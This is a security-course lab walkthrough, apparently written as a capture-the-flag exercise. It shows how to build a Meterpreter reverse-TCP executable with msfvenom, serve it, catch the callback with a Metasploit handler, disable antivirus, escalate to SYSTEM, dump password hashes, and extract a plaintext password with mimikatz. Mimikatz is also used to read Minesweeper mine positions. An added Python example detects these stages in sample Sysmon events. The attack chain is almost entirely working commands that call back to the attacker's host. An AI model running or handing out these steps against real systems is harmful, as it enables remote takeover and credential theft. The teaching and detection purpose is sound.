4.1: Mimikatz (15 pts. extra credit)

What You Need

Purpose

We will use Kali Linux and Metasploit to create an infectious EXE file.

A user who runs that file surrenders control of their computer.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
ifconfig
Find your IP address and make a note of it. In the example below, it is 172.16.1.203.

Using Msfvenom to Make a Malicious EXE

In Kali, execute this command to learn about msfvenom, which is part of Metasploit.
msfvenom -h
A help message appears, as shown below.

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.203 -f exe > /var/www/html/fun.exe
service apache2 start
The operation proceeds without errors, as shown below.

Troubleshooting

If msfvenom crashes on a line in the "android.rb" file, try editing that file and viewing that line. It may define a certificate that is valid for 20 years. Delete the "0" to make it valid for only 2 years to fix the error.

Another workaround is to use 64-bit Kali; msfvenom works better on that OS.

Launching Msfconsole

In Kali, execute this command to start msfconsole, the main control system for Metasploit.
msfconsole
Metasploit launches, as shown below.

In Kali, at the msf> prompt, execute this command.

help
Several pages of help scroll by. The section we'll use is "Module commands", as shown below.

Starting a Command-and-Control (C&C) Server

Execute these commands to start a C&C listener.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a "reverse TCP handler", as shown below.

Putting a Password on the Target Machine

On the target Windows machine, click Start, "Control Panel", "User Accounts", "Change your Windows password", "Create a password for your account".

Enter a password of P@ssw0rd in both the password boxes, as shown below.

Click the "Create password" button.

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine:
http://172.16.1.203/fun.exe
The file "fun.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

On your Kali machine, a meterpreter session opens, as shown below.

Privilege Escalation and Stealing Password Hashes

On your Kali machine, at the meterpreter > prompt, execute this command:
getuid
As shown below, we have Administrator privileges.

To steal the plaintext password from memory, we need to run as SYSTEM, which is more powerful than the Administrator account.

On your Kali machine, at the meterpreter > prompt, execute these commands:

getsystem
getuid
"getuid" reports that you have SYSTEM privileges now, as shown below.

On your Kali machine, at the meterpreter > prompt, execute this command:

hashdump
You see password hashes, as shown below.

Stealing a Plaintext Password

We could try to crack those hashes to get passwords, but that might be a lot of work.

Fortunately, Windows stores the password of the currently logged-on user in RAM in a reversibly encrypted form, so we can steal it directly :).

On your Kali machine, at the meterpreter > prompt, execute these commands:

load mimikatz
kerberos
The plaintext password is revealed, as highlighted in the image below!
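From the defender's side, the chain above leaves three observable traces: an EXE launched from a user's download folder, an outbound connection from that EXE to the handler, and a process opening LSASS memory for reading. Below is an added example, not part of the original lab, that flags those traces in constructed Sysmon-style records (event IDs 1, 3 and 10 and their field names are real; the paths, the allowed-reader list and the callback port 4444 are assumptions, 4444 being msfvenom's default LPORT).

```python
# Added example (not from the original lab): a toy detector for the three
# observable stages of the chain above, run over constructed Sysmon-style
# records. Sysmon event IDs (1 = ProcessCreate, 3 = NetworkConnect,
# 10 = ProcessAccess) and field names are real; the values are made up.

LSASS = r"c:\windows\system32\lsass.exe"
PROCESS_VM_READ = 0x0010          # access right needed to read LSASS memory
# Processes assumed to legitimately read LSASS memory on this host.
LSASS_READERS_ALLOWED = {r"c:\windows\system32\msmpeng.exe"}

# Constructed events: the EXE runs from the browser's download folder, calls
# back to the handler, then opens LSASS for memory reading. The last record is
# a benign svchost query (no VM_READ bit) that must NOT fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\bob\Downloads\fun.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "Image": r"C:\Users\bob\Downloads\fun.exe",
     "DestinationIp": "172.16.1.203", "DestinationPort": 4444},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\fun.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
]


def in_user_profile(image):
    """True when the executable lives under a user profile, not a system dir."""
    return "\\users\\" in image.lower()


def detect(events):
    """Return (rule, detail) alerts raised by the event stream, in order."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1 and in_user_profile(ev["Image"]):
            alerts.append(("exe-launched-from-user-profile", ev["Image"]))
        elif eid == 3 and in_user_profile(ev["Image"]):
            dest = f"{ev['DestinationIp']}:{ev['DestinationPort']}"
            alerts.append(("user-profile-exe-outbound", f"{ev['Image']} -> {dest}"))
        elif eid == 10 and ev["TargetImage"].lower() == LSASS:
            granted = int(ev["GrantedAccess"], 16)   # Sysmon logs a hex string
            src = ev["SourceImage"].lower()
            if granted & PROCESS_VM_READ and src not in LSASS_READERS_ALLOWED:
                alerts.append(("lsass-memory-read", ev["SourceImage"]))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule}: {detail}")
```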

Winning at Minesweeper

On your host system, in a Web browser, go to

http://www.minesweeper.info/downloads/WinmineXP.html

Click DOWNLOAD. A Winmine__XP.exe file downloads.

Rename this file to winmine.exe

Drag the winmine.exe file into your Windows machine and run it, as shown below.

This is a game in which you must click on the empty squares, avoiding the squares that contain mines.

On your Kali machine, at the meterpreter > prompt, execute this command:

mimikatz_command -f winmine::infos
Mimikatz reads the locations of the mines from RAM and displays them, as shown below.

Play the game and win it, using the information from Mimikatz.

When you win, you see the screen below. Part of the message is redacted in the image below.

4.1 Recording Your Success

Updated 5-23-18 to run as a CTF
Slight changes 6-4-18
Android.rb fix added 6-14-18